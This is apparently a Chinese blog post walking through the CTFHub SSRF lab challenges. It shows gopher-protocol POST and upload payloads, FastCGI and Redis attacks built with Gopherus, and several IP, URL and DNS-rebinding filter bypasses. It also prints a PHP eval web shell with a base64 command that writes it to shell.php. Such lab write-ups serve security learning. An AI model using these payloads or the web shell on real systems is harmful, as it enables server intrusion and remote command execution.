目录
GTFHUB-内网访问
根据提示我们在网站后面输入 http://127.0.0.1/flag.php
CTFHUB-读取文件
根据提示需要读取Web目录下的文件
Linux默认网站的路径是 /var/www/html
我们在网站后面输入 file:///var/www/html/flag.php 然后右键查看源代码查出结果
CTFHUB-端口扫描
根据提示端口号在8000-9000之内,所以这里我们需要用到BP抓包
我们先输入 http://127.0.0.1 后面随便输入个端口进行抓包
右键点击 发送到Intruder
可以看出有两条数据长度不一样,因为第一个是503肯定不对,所以点开第二条,就能查看到结果啦
CTFHUB-POST请求
步骤一:访问 flag.php,发现key值并结合题目,需要我们用gopher协议去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。使用方法:gopher://ip:port/_payload
步骤二:构造POST请求数据包..并使用CyberChef进行URL编码操作
步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A
步骤四:再次进行URL编码并使用Gopher进行攻击访问,获取flag
GTFHUB-上传文件
步骤一:通过http://协议来读取flag.php源码
步骤二: 以上源码中需手动添加提交框并提交文件大小 大于0的文件并抓包.
<input type="submit" name="submit">
步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下
这里不要忘记把中文乱码部分换为两个中文字
步骤四:将二次编码后的数据粘贴到网址并使用Gopher进行攻击访问,获取flag
CTFHUB-FastCGI
步骤一:准备一句话木马并构造要执行的终端命令:对一句话木马进行base64编码且写入到名为shell.php的文件中。
<?php @eval($_POST["cmd"]);?>
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php
步骤二:使用Gopherus工具生成payload --需要文件可以私信我
执行命令
python2 gopherus.py --exploit fastcgi
步骤三: 将生成的payload再进行第二次编码即可...访问上传..
步骤四:需要用到软件来连接,我这里用的是中国菜刀也可以用其他软件 --没有软件其他可以私信我
CTFHUB-Redis协议
步骤零:Redis相关知识...这题不是用shell反弹而是写文件,然后进行命令执行
步骤一:和方法一样CTFHUB-FastCGI需要使用Gopherus工具生成payload
执行命令:python2 gopherus.py --redis
步骤二:进行一次URL编码后并访问上传的文件shell.php
步骤三:和 CTFHUB-FastCGI方法一样复制复制网址,用中国菜刀连接就能获取到flag
--没有软件的可以私信我
CTFHUB-URLBypass
根据提示可知此题需要绕过
# 绕过
/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
CTFHUB-数字IPBypass
# 思路
开始尝试了127.0.0.1/flag.php但是有提示“Hack ban Intranet IP”,既然是数字绕过,我们可以把127.0.0.1转化为其他的形式进行绕过
#绕过姿势
127.0.0.1->localhost
127.0.0.1->7F000001 十六禁止
127.0.0.1->2130706433 十进制
127.0.0.1->2130706433 Enclosed Alphanumerics
CTFHUB-302跳过Bypass
# 思路
开始尝试了127.0.0.1/flag.php但是有提示“Hack ban Intranet IP”,既然是数字绕过,我们可以把127.0.0.1转化为其他的形式进行绕过
# 绕过姿势
?url=http://0x7F000001/flag.php
?url=http://localhost/flag.php
CTFHUB-DNS重绑定Bypass
# 利用思路
对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就pass掉。但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,我们可以进行DNS 重绑定攻击。我们利用DNS Rebinding技术,在第一次校验IP的时候返回一个合法的IP,在真实发起请求的时候,返回我们真正想要访问的内网IP即可。
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。这样就可以进行攻击了,完整的攻击流程为:
1.服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP
2.对于获得的IP进行判断,发现为非黑名单IP,则通过验证
3.服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务器返回的是内网地址。
4.由于已经绕过验证,所以服务器端返回访问内网资源的结果。
# 附件网站
https://lock.cmpxchg8b.com/rebinder.html
# 利用
?url=http://7f000001.7f000002.rbndr.us/flag.php
需要软件和文件的可以私信!
Meet.meet